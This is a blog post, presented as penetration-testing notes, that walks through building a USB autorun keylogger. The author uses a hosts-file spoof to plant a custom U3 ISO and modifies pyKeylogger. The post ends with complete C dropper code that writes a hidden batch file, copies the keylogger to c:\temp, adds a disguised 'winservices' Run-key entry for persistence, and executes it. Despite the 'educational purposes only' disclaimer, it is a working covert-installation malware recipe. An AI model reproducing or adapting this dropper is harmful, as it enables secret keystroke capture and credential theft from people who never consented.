Penetration testing blog

This is just for educational purposes only and meant for keeping this code somewhere accessible. The other night I tried to create a keyboard sniffer which would get installed and running by using the autorun feature of U3 sandisk USB sticks.

I reformatted the U3 ISO by using the incredible u3-autorun project located at:

http://sourceforge.net/projects/u3-autorun/

The tool explains that if you get the LPInstaller utility (the link for downloading it is referenced inside the project package file) to be in the same directory of the ISO file (cruzer-autorun.iso) then the tool will simply use the local iso file instead of downloading it from the sandisk web servers.

Well facts are that in my case that didn’t work - so I followed some instructions that I found online where given the fact that the LPInstaller downloads an unsigned/unencrypted ISO file from the webservers, you could simply trick the program into downloading the iso file from the webserver of your choice (i.e.: pointing u3.sandisk.com to 127.0.0.1 by modifying your win32\system32\drivers\etc\hosts file) - and that worked like a charm.

Once the new ISO file is deployed in the unwriteable partition of the USB stick, you can create an autorun.inf (can’t remember the exact filename, there’s a sample file included tho) file in the writeable partition and have the autorun program run any program of your choice.

So I grabbed the pyKeylogger from http://pykeylogger.sourceforge.net and modified the code to exclude the Donation nag window which shows up after X days of usage and is veeery easy to disable (when I should have donated to the project instead! I encourage you to do so..it’s a nice piece of software) and recompiled/packaged the whole python keylogger into a windows executable.

Very easy you could say, althought I thought that was it - when I realized that the keylogger remained inside the USB stick after being executed (and I wanted it to be persistent) I had to find a way of making the keylogger copy itself to the user’s hard drive and then finding a way of executing it off the hard-drive, not off the usb-stick.

REMEMBER: This was all done for educational purposes only and never meant to harm anyone.

So these are the two paths that I could have followed:

A) I could have modified the autorun ISO code, generate a new ISO and then replace the U3 ISO with my new one.

B) Use the autorun ISO as-it-is, as I downloaded it from sourceforge.

Unfortunately, or fortunately…? I followed (B) - I decided it wouldn’t be so damn of a workaround to find a way of making the default autorun ISO copy a file and then execute it. Unluckily for me, the autorun.inf file that is supported by the u3-autorun program only takes 1 binary filename (Which probable runs createprocess for) but takes absolutely no arguments (or the way I tried) and of course it doesn’t take batch files either.

But it was around 1, 2am and I didn’t quite find out the latter (batch files execution) until I had already created a whole batch file which took care of xcopying the contents of the ‘dist’ directory (Where the pykeylogger distribution resides inside the usb stick) to a temporary directory inside c:\temp

So once the batch file exists, I find out I can’t use a batch filename inside the autorun and I code a quick program in C. The program in C contains the code that is listed below.

The final formula was:

1. The ISO u3-autorun.inf ends up executing my-c-program.exe
2. my-c-program.exe creates a hidden batchfile in the user’s c:\windows directory
3. the batchfile creates a temporary directory inside c:\temp and copies the contents of the \dist subdirectory inside the USB stick where the keylogger distribution resides to that temporary subdirectory inside c:\temp
4. the batchfile creates a registry entry at CurrentVersion\Run calling a batchfile inside the keylogger directory, which ends up executing the keylogger using the local path.
5. the batchfile executes the keylogger
6. and my-c-program.exe after creating the batchfile executes the batchfile by calling execve and calling cmd.exe using /c batchfilename as parameters.

The reason I had to do all this mess is because:

• I wanted the keylogger to remain persistent, so it would install by inserting the usb stick and stay persistent if the usb stick was removed/the computer was restarted/etc.
• If the pykeylogger is run using a full path and not sitting in the local directory, then certain errors are thrown (and I didnt mind looking into the source for patching those problems..I should have..?)
• Once the USB stick drive is inserted and the autorun file is executed - I needed to know the full path (drive letter) of the USB stick dist subdirectory (which I worked around at 2am by creating the batch file dynamically from within the exe file, who parses argv[0] - instead of going through the msdn looking for something like GetModuleFilename() that would work)
• I can’t really remember - but it’s 2 am today again..so it’s fair.

Here’s the sample C code so it remains somewhere handy:

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define BATCH_PATH “c:\\windows\\win255.bat”
#define CMD_PATH “c:\\windows\\system32\\cmd.exe”

int
main(int argc, char **argv) {

FILE *myfile;
char *params[4];
char *res = 0×0;
char final[10000];
char localpath[255];

char *batch_contents = “@echo off\nmkdir c:\\temp\nmkdir c:\\temp\\win21\nxcopy /E %s\\dist c:\\temp\\win21\\\nc:\ncd c:\\temp\\win21\nreg ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v winservices /t REG_SZ /d c:\\temp\\win21\\winservices.bat\ncls\nwinservices.exe\n\0″;

 params[3] = 0×0;
 params[2] = BATCH_PATH;
 params[1] = “/c”;
 params[0] = CMD_PATH;

 myfile = fopen(BATCH_PATH, “w”);
 if (myfile == NULL) exit(-1);

 strncpy(localpath, argv[0], sizeof(localpath)-1);
 res = strtok(localpath, “\\”);
 if (res == NULL) exit(-1);

 _snprintf(final, sizeof(final)-1, batch_contents, res);
 final[sizeof(final)-1] = 0×00;
 fprintf(myfile, “%s”, final);
 fflush(myfile);
 fclose(myfile);

 execve(params[0], params, NULL);

 return 0;
}